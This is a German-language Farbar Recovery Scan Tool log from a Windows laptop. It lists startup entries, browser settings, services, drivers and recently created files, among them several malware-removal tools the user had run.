==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. KG)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF NewTab: about:newtab
FF Homepage: about:home
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems)
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert]

Chrome:
=======
CHR dev: Chrome dev build erkannt! <======= ACHTUNG
StartMenuInternet: Google Chrome - chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert]
R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate)
R2 MBAMScheduler; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-30] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation)
S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-30 14:42 - 2016-03-30 14:43 - 00015262 _____ C:\Users\Denny\Desktop\FRST.txt 2016-03-30 14:03 - 2016-03-30 14:03 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore 2016-03-30 13:51 - 2016-03-30 12:59 - 00024064 _____ C:\WINDOWS\zoek-delete.exe 2016-03-30 12:59 - 2016-03-30 13:44 - 00000000 ____D C:\zoek_backup 2016-03-30 12:59 - 2016-03-30 12:59 - 01309184 _____ C:\Users\Denny\Downloads\zoek.exe 2016-03-30 12:48 - 2016-03-30 12:48 - 00000749 _____ C:\Users\Denny\Desktop\Revo Uninstaller.lnk 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\Desktop\Revo Uninstaller 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2016-03-30 12:45 - 2016-03-30 12:45 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Denny\Downloads\revosetup95.exe 2016-03-29 19:15 - 2016-03-29 19:35 - 00197204 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_19.15.23_log.txt 2016-03-29 18:17 - 2016-03-29 18:18 - 03102208 _____ C:\Users\Denny\Desktop\AdwCleaner_5.107.exe 2016-03-29 16:48 - 2016-03-30 13:54 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-03-29 16:48 - 2016-03-29 18:20 - 00001072 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 
2016-03-29 16:48 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-03-29 16:43 - 2016-03-29 16:47 - 22851472 _____ (Malwarebytes ) C:\Users\Denny\Downloads\mbam-setup-2.2.1.1043.exe 2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt 2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt 2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe 2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-03-28 23:46 - 2016-03-30 12:47 - 00000000 ____D C:\Users\Denny\Desktop\Infos 2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt 2016-03-28 23:34 - 2016-03-30 14:42 - 00000000 ____D C:\FRST 2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt 2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe 2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe 2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500 2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira 2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages 2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü 
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Bilder 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Verlauf 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider 2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) 
C:\Users\Denny\Downloads\JRT.exe 2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe 2016-03-22 00:21 - 2016-03-29 18:20 - 00001123 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-29 18:20 - 00001117 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe 2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 
____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys 2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-03-21 23:26 - 2015-12-30 23:53 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll 2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll 2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2016-03-21 22:54 - 2016-03-29 18:39 - 00000000 ____D C:\AdwCleaner 2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd 2016-03-21 18:50 - 
2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP 2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp 2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe 2016-03-21 18:37 - 2016-03-29 18:20 - 00001192 _____ C:\Users\Public\Desktop\Avira Antivirus.lnk 2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira 2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app 2016-03-21 18:14 - 2016-03-21 18:43 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira 2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira 2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. 
KG) C:\WINDOWS\system32\Drivers\avkmgr.sys 2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira 2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll 2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-03-21 16:24 - 2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) 
